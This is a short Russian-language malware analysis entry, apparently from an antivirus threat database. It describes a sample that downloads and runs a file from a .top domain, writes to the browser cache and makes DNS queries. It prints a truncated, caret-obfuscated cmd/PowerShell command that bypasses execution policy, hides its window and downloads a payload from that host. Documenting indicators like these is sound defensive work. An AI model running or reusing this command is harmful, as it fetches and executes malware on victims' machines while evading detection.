Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://zussipussicscds.top/search.php как %appdata%.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /C "Pow^E^R^sHe^l^L.eX^e^ -E^xE^cUt^i^O^NpoLi^cy B^Y^P^aS^S -^nOprof^Il^e -wI^ND^OwstYl^e H^I^DdE^n ^(^n^EW-OBj^eC^t^ ^S^y^STe^m.NE^t^.We^bcLIe^N^t)^.dOw^nl^oaD^fiLE(^'http://zus...
Изменения в файловой системе
Создает следующие файлы
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\dyps348i\config14[1].txt
Сетевая активность
UDP
- DNS ASK zu####ussicscds.top
Другое
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /C "Pow^E^R^sHe^l^L.eX^e^ -E^xE^cUt^i^O^NpoLi^cy B^Y^P^aS^S -^nOprof^Il^e -wI^ND^OwstYl^e H^I^DdE^n ^(^n^EW-OBj^eC^t^ ^S^y^STe^m.NE^t^.We^bcLIe^N^t)^.dOw^nl^oaD^fiLE(^'http://zus... (со скрытым окном)
